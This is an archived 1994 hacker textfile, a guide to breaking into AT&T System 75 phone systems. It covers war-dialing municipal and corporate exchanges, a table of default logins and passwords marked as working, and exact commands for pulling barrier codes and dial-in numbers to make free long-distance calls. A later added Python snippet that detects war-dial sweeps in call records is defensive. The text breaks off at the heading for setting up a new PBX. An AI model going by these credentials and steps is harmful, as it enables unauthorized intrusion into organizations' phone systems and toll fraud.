Freaks Macintosh Archive / Textfiles / k0p - oleBuzzard / System7.5Guide.txt (Text File, 1998-02-21, 16KB, 345 lines)
#######################################################
# #
# oleBuzzard's %%%%%%%%%%%%%% %%%%%%%%%% #
# %%%%%%%%%%%%%% %%%%%%%%%% #
# Compleat Guide To %%%%%% %%%% #
# %%%%%% %%%% #
# ### ## ## ## ### %%%%%%%%%% #
# ## ##### ## ## ## ## ##### %%%%%%%%% #
# ### ### ### ### ### ### %%%% #
# ##### ## #### #### ##### ## %%%% #
# ### #### #### ### %%%%%% #
# #
###########################################05-Jan-94###
INTRODUCTION/SCORN
You know, I've always hated 'Elitism' in the BBS world. For me, the reason
why I got into BBSing was because of my enthusiasm for computers and my
obsession with information. I thrive off of knowledge and reap the
benefits. My only obstacles in life are those I have encountered who felt I
was not worthy of the information I sought. These people make me sick,
especially the ones who know so very little yet think they know oh so much.
Which brings me to today's topic: System 75.
You want to know how you can tell a real lamer? Ask him for information
about System 75. 9 times out of 10, the person will scoff at you and act as
if he was the head of the Joint Chiefs of Staff and you were a Private
asking HIM about covert maneuvers in the Asian Theatre. This attitude most
apparently reveals itself in almost every file on System 75 I have ever
read. I have yet to read a file on System 75 (including the one in Phrack
41) that included even one default, or even information on how to find a
Sys75. It's a fucking joke and not a very funny one. Although Sys75s are
very interesting systems to hack, they are hardly worthy of the coveted
status they receive. (Of course, in my opinion no information is worthy of
coveted status, but that's another story.) The truth is Sys75s are great
systems because they are relatively easy to learn and manipulate and they
are one of the only systems that in and of themselves involve a blending of
hacking and phreaking. This file will aid you in your first attempt at
Sys75 and hopefully give you an adequate and useful introduction to one of
the underground's favorite systems.
SYSTEM 75 INFO
System 75 is a hardware/software based multi-purpose communications system
offering a wide range of business applications, including Voice Mail
(AUDIX), networking (ISDN) and long-distance teleconferencing (PBX!!!). For
purposes of this file we will focus on Sys75's long-distance
teleconferencing capabilities as made possible by the Public Branch
Exchange.
System 75s have the ability to establish a new PBX or retrieve all the
information about an existing PBX. In either case, if you can accomplish
the task at hand - retrieving PBX info or establishing a new PBX - the end
result is the same, free phone calls -- a valuable commodity in the realm
of underground communications. This is why System 75s are so popular and
information on them so coveted. Unfortunately if you don't know what you're
looking for or what you're doing you won't get far. That's what this file is
for: to aid you in finding a Sys75 and help you to correctly manipulate the
system once you've found it. (You can thank me later.)
HACKING SYSTEM 75
In the following pages you will see many screens from an ACTUAL System 75
(ooo!). The screens will be within various steps of either retrieving
information on an existing PBX or on establishing a new PBX. Some useful
but nonessential information may be cut out, and as well some information
may be omitted for security reasons. But rest assured there will be more
than enough information retained to help you establish your very own PBX.
PART 1: Finding and Identifying a System 75
Well, finding and identifying a System 75 are relatively easy tasks so I
won't spend much time on it, but I will note that finding and identifying,
although complementary, are two different tasks. I have often seen
information on identifying a Sys75, but I have never seen anything on how
to actually find one. If you can't find one, who cares how to identify
one!?!
Finding A System 75
When trying to find a System 75, I suggest you employ a quality scanner
that is reliable and bug free. My experience is that very few scanners meet
these criteria and instead most have glitches to the point that they are all
but useless. Of course nothing is without exception. There are a few
scanners I have found to be relatively reliable. These include ToneLoc
.098, BlueBeep .007 and on the Macintosh, Holy War Dialer v2.0.
Once you have found a reliable scanner, I suggest you configure it with the
following parameters to ensure optimal scan speed without missing a System
and to cut down on the amount of unnecessary scanning.

    Baud Rate:      2400       [Scanning for all baud rates UP TO 2400 inclusive]
    Time Interval:  approx. 18 sec. [Different scanners, different count, but 18
                               seconds in real time is about right]
    Starting #:     xxx-0000   [ALWAYS start here]
    Ending #:       xxx-0500   [I have never found a Sys75 past 0500 and in fact
                               most I have found have been in the xxx-00xx range,
                               or in other words, within the first 99 numbers of
                               an exchange.]
I would suggest looking for a Sys75 in your city's Municipal Government
exchange first. Where I live all city and county facilities within the
city (courthouse, police, PUC, etc) have the same exchange. Start your scan
in this exchange(s) because there is almost certainly a System 75 set up.
Once you find a Sys75 in an exchange move to another exchange to look for
the next one. Some have argued (correctly so) that there are sometimes more
than one Sys75 in an exchange. Although they are correct I have found far
more Sys75s by searching the first 500 numbers of many exchanges than 9999
numbers in a few. Also, only once have I found more than one Sys75 in an
exchange.
Once you have exhausted your scan of the municipal exchange(s) I suggest
moving to an exchange assigned to a large company. In many cases there are
company facilities so large they are assigned their own exchange. These
facilities almost certainly have a Sys75 set up, so check it out. Examples
of facilities I know of that have their own exchange and a Sys75 within
that exchange are IBM, HP, DEC and KAMAN Sciences in the city of You
Wishville.
My final tip on finding a System 75 is to scan at night. It cuts down on
the possibility of hitting a system which is in use and thus has the line
occupied. Of course if all you guys hack at night then the line will be
busy anyway and it won't matter, so....
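Seen from the other side of the line, the sweep described above (consecutive numbers walked from xxx-0000, a call every 18 seconds or so, at night) is exactly the pattern a PBX administrator can pick out of call-detail records. The following is an added example, not part of the original file; the CDR column layout and the sample rows are constructed assumptions, not real call data.

```python
"""Spot a sequential war-dial sweep in call-detail records (CDRs).
Added example, not part of the original file. Assumes a constructed
CDR format: caller,called,start(ISO),duration_sec per line."""
from collections import defaultdict
from datetime import datetime

# Constructed sample (not real data): one caller walks 635-0000 upward
# every 18 s at 2 AM; another caller makes one ordinary daytime call.
SAMPLE_CDR = """\
5550123,6350000,1994-01-05T02:00:00,12
5550123,6350001,1994-01-05T02:00:18,11
5550123,6350002,1994-01-05T02:00:36,13
5550123,6350003,1994-01-05T02:00:54,12
5550123,6350004,1994-01-05T02:01:12,14
5559999,6350044,1994-01-05T09:15:00,305
"""

def parse_cdr(text):
    """Parse the constructed CSV into dicts sorted by call start time."""
    rows = []
    for line in text.splitlines():
        caller, called, start, dur = line.split(",")
        rows.append({"caller": caller, "called": called, "duration": int(dur),
                     "start": datetime.fromisoformat(start)})
    return sorted(rows, key=lambda r: r["start"])

def find_sweeps(rows, min_calls=5, max_gap_sec=60, max_duration_sec=30):
    """Return (caller, exchange, count) for each run of >= min_calls short
    calls to consecutive numbers in one exchange, each within max_gap_sec."""
    by_caller = defaultdict(list)
    for r in rows:
        by_caller[r["caller"]].append(r)
    sweeps = []
    for caller, calls in by_caller.items():
        run = []
        for cur in calls:
            prev = run[-1] if run else None
            extends = (prev is not None
                       and cur["called"][:3] == prev["called"][:3]
                       and int(cur["called"]) == int(prev["called"]) + 1
                       and (cur["start"] - prev["start"]).total_seconds() <= max_gap_sec)
            if extends and cur["duration"] <= max_duration_sec:
                run.append(cur)
                continue
            if len(run) >= min_calls:  # run broken: report it if long enough
                sweeps.append((caller, run[0]["called"][:3], len(run)))
            run = [cur] if cur["duration"] <= max_duration_sec else []
        if len(run) >= min_calls:  # run still open at the end of the records
            sweeps.append((caller, run[0]["called"][:3], len(run)))
    return sweeps
```

Long calls and non-consecutive numbers break a run, so a normal call into the same exchange does not get counted as part of the sweep.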
Identifying A System 75
You'll be able to identify a System 75 by the following information which
appears when you have connected to one.
PROTOCOL: NONE
CONNECT 1200 [1200 baud is a good indicator that you have found a Sys75]
KEYBOARD LOCKED, WAIT FOR LOGIN [Short pause here]
Login:
Ok, well that's what a System 75 looks like when you've first connected. You
don't have to hit any special keystrokes at this point and all entries end
with <CR>.
PART 2: Logging In
Passwords, password, passwords! The assholes never give you the fuckin
passwords. What the fuck does a tutorial on System 75 do if it doesn't
include a password so you can actually do something?!? Not much in my
opinion. Well Sys75s have two types of passwords. Those which can alter
information and those which can only browse information. The following is a
list of ALL Sys75 defaults. Although the list is complete there is no
guarantee that all or any of them work. Also, because the access for the
defaults is assignable you have to check for yourself to see which defaults
alter and which defaults can only browse. The information I am providing is
for the last Sys75 I hacked.
System 75 Default Accounts

    Login      Password     Type
    -----      --------     ----
    bcim       bcimpw       didn't work
    bcms       bcms         didn't work
    blue       bluepw       altering
    browse     looker       browsing
    craft      craftpw      didn't work
    cust       custpw       browsing
    enquiry    enquirypw    browsing
    inads      inads        didn't work
    init       initpw       didn't work
    locate     locatepw     browsing
    maint      rwmaint      altering
    rcust      rcustpw      altering
    support    supportpw    didn't work
    tech       field        altering
Once you've logged in you will be prompted to enter the Terminal Type.

    Terminal Type (513, 4410, 4425): [513] 513

Enter 513, that's the default.
And then you will see the world famous login screen:
_____________________________________________________________________________
Copyright (c) 1986 - AT&T
Unpublished & Not for Publication
All Rights Reserved
_____________________________________________________________________________
enter command: _
PART 3: Hack 1 - Retrieving PBX Information
The following information is on how to retrieve PBX info for your own use.
This is the safest method of hacking Sys75 because it doesn't require
altering ANY information. This is relatively easy so I'll go through it
quickly. You will be given the prompt "enter command:". You can basically
enter everything I enter, word for word, to make the hack.
enter command: disp rem          [short for display remote-access]
_____________________________________________________________________________
display remote-access                                            Page 1 of 1

        Remote Access Extension: 2531
            Barrier Code Length: 5
    Authorization Code Required? n          <-- PBX already established

    BARRIER CODE ASSIGNMENTS (Enter up to 10)
        Barrier Code  COR  COS           Barrier Code  COR  COS
     1: 49138          1    1        6:                1    1   <-- Barrier Code
     2:                1    1        7:                1    1
     3:                1    1        8:                1    1
     4:                1    1        9:                1    1
     5:                1    1       10:                1    1
In this (rare) instance we have found a Sys75 with a PBX already set up.
All we have to do is find the corresponding trunk-group and get the dial-in
number. The trunk group contains all the routing information for the trunk
the PBX goes through.
* NOTE * Write down the Barrier Code. You will need it! (duh!)
To find the trunk that corresponds to the established PBX we will be
looking for a trunk group with a Night Service extension the same as the
Remote Access Extension (from disp rem).
enter command: disp trunk 1
_____________________________________________________________________________
display trunk-group 1                                            Page 1 of 5

   Group Number: 1            Group Type: did          SMDR Reports? y
     Group Name: Intra-Lata          COR: 1                     TAC: 50
                              Data Restriction? n
                                  MIS Measured? n
                                     Auth Code? n
TRUNK PARAMETERS
     Trunk Type: wink-start        Incoming Rotary Timeout(sec): 5
     Incoming Dial Type: tone
     Trunk Termination: 600ohm     Disconnect Timing(msec): 300
     Digit Treatment:              Digits:
     Expected digits:
     ACA Assignment? n
     Maintenance Tests? y
     Answer Supervision Timeout:
_____________________________________________________________________________
Well this ain't it because this one doesn't even contain a Night Service. A
Night Service is important because it determines whether or not a PBX is 24
hour. No Night Service means during business hours only. For
purposes of this hack a Night Service is important because it will identify
the correct trunk.
Because there is no Night Service we won't bother to check the other four
pages (Note the top of the screen says Page 1 of 5). Normally we would
check the other pages and we would do so by hitting ESC [U for next page.
Instead we'll cancel the last command and check some other trunks. At the
prompt enter ESC Ow.
Go through all the trunks until you find one with a corresponding Night
Service. The process for going through trunks is simple. Enter disp trunk x
(where x is a number from 1 to 99) and hit <CR>. If you don't see a Night
Service, or if you see a Night Service and the extension following the Night
Service doesn't match the Remote Access Extension, then hit ESC Ow and go to
the next trunk and repeat the process.
enter command: disp trunk 6
_____________________________________________________________________________
display trunk-group 6                                            Page 1 of 5

   Group Number: 6            Group Type: co           SMDR Reports? y
     Group Name: Intra-Lata          COR: 7                     TAC: 25
      Direction: two-way      Outgoing Display? n      Data Restriction? n
                                                           MIS Measured? n
    Dial Access? y            Busy Threshold: 1        Night Service: 2531
   Queue Length: 1      Abandoned Call Search? n       Incoming Destination:
      Comm Type: voice              Auth Code? n       Digit Absorption List:
      Prefix-1? y              Restriction: toll       Allowed Calls List? y
TRUNK PARAMETERS
     Trunk Type: loop-start
     Outgoing Dial Type: tone
     Trunk Termination: rc          Disconnect Timing(msec): 500
     ACA Assignment? n
     Maintenance Tests? y
     Answer Supervision Timeout:    Suppress # Outpulsing? n
_____________________________________________________________________________
Well we found it. Notice the Night Service and extension. This group has
Night Service and it has an extension the same as the remote-access
extension. Next all we need to do is find out the dial-in number. At the
prompt enter: ESC [U for the next page.
_____________________________________________________________________________
display trunk-group 6                                            Page 2 of 5
                        GROUP MEMBER ASSIGNMENTS
      Port      Name        Mode    Type    Answer Delay
  1:  D2003     635xxxx
  2:  D2004     635xxxx
  3:  D2005     635xxxx
  4:  D2006     635xxxx
  5:  D2002     635xxxx
  6:
  7:
  8:
  9:
 10:
 11:
 12:
 13:
 14:
 15:
_____________________________________________________________________________
Well I decided not to include the complete dial-in number, but you get the
idea. All you have to do at this point is write down ALL the dial-in
numbers and logoff. Type ESC Ow to cancel (exit) and at the prompt type:
logoff to (guess).
Now dial one of the dial-in numbers and enter the Barrier Code+9+1+ACN and
that's it. No changes made and you've only committed one count of unlawful
entry of a computer system (10 days with work release tops). Now you have
an unabused PBX for personal use or trade.
PART 4: Hack 2 - Setting Up A PBX